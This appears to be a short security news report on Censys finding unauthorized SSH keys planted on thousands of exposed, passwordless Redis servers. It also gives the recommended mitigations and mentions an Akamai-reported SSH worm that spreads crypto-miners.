Information security analysts from Censys reported unauthorized SSH public key installation on 15,526 of 31,239 unauthenticated Redis servers.
Redis is the fourth most used database engine after MySQL, PostigreSQL and Microsoft SQL. Unlike traditional relational databases, Redis was not designed with security in mind and is designed to be accessed by trusted clients in trusted environments. Initially, the engine was supposed to always be used only for internal and private communications without a direct connection to the Internet and behind a firewall.
However, as practice has shown, some Redis databases turned out to be incorrectly configured, were tied to the public interface, and some did not have authentication password protection. Thus, under certain conditions, if Redis is running under a user account, attackers can write the SSH public key file to the root account by directly logging into the victim’s server via SSH. This can allow hackers to gain privileges on the server, for example to delete or steal data. To mitigate the threat, users are advised to enable client authentication, configure Redis to run only on internal network interfaces, prevent abuse of the CONFIG command by renaming it, and configure firewalls to only accept Redis connections from trusted hosts. In June, a similar problem was reported by computer security specialists from Akamai.
They found a botnet with signs of an SSH worm attacking SSH servers to spread mining malware. According to Akamai, after gaining access, the virus places cryptocurrency miners, and tries to hide its activities as much as possible, for example, using process monitoring and turning off the mining module in case of danger.